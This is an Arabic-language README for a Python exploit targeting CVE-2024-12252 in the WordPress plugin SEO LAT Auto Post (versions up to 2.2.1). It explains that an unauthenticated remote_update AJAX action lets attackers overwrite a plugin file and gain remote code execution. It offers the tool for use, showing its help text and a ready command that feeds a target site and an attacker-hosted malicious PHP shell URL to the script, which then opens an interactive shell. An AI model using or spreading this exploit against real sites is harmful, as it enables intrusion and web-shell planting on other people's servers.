
SEO LAT Auto Post <= 2.2.1 - غياب التفويض لاستبدال/رفع الملفات (تنفيذ أكواد عن بُعد)
إن إضافة SEO LAT Auto Post لووردبريس عرضة لاستبدال الملفات بسبب غياب فحص الصلاحيات في إجراء AJAX باسم remote_update في جميع الإصدارات حتى 2.2.1 وما يتضمنه. وهذا يتيح للمهاجمين غير المصادَق عليهم استبدال الملف seo-beginner-auto-post.php، والذي يمكن استغلاله لتحقيق تنفيذ التعليمات البرمجية عن بُعد.
يستغل هذا السكربت الثغرة الأمنية في إضافة SEO LAT Auto Post لتحقيق تنفيذ التعليمات البرمجية عن بُعد من خلال استبدال الملف seo-beginner-auto-post.php. يقوم السكربت بأتمتة عملية فحص إصدار الإضافة، وتشغيل الاستغلال، وتوفير صدفة تفاعلية لتنفيذ الأوامر.
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
Direct URL to your malicious PHP shell
شغّل السكربت باستخدام عنوان الهدف وعنوان ملف الـ PHP الخبيث الخاص بك:
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php